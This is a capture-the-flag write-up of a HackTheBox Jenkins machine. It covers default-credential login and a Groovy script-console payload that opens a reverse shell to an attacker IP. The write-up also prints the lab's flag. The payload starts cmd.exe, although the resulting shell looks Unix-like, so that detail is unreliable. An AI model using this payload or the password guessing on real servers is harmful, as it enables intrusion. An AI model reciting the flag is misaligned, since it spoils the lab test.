# Metadata

IP: 10.129.180.32
Date accessed: 2/15/2022 10:20AM


# Nmap

- found http-server-header: Jetty(9.4.39.v20210325)
- Jenkins

# Admin bruteforce
password guessing let me in with root:password

# Enumeration
## Research steps

The one thing that makes you better at hacking is the skill to research. Here are my thought process
1) I found the version of Jenkins on the bottom right corner of the dashboard
2) Search for exloit-db for this version of Jenkins. My goal is to find some exploit that can help me interact with the server uch as reverse shell
3) Found a RCE exploit, perfect. this means that I can use this exploit
4) Look for a payload
5) tried the payload, does not work 
6) Go back and look for the dashboard, see if there is anything else I'm missing
7) there is a section where you can insert arbritrary code , Groovy code. I clicked on the Groovy documentation link in the oage
8) My next goal is to look for something inthe documentation that can help me run a useful script
9) clicked on the SEcurity tab, found that they disclose an RCE remediation for this version I can test this
10) Look for Groovy RCE payload -> found one on Payload all the things
11) Modify the payload so that it matches my IP
12) Set up a netcat listener on port 4444
13) Run this payload 

````

Thread.start{
 String host="10.10.14.125";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); 
}
````

14) got a connection on my netcat, checking for id
15) I AM ROOT 
16) check for flag

`
pwd
/
cd root
ls
flag.txt
snap
cat flag.txt
9cdfb439c7876e703e307864c9167a15
`

It looks like the HTB instructions wants us to do something else with the payload, or choose another payload, but I guess I found another way to get the flag. 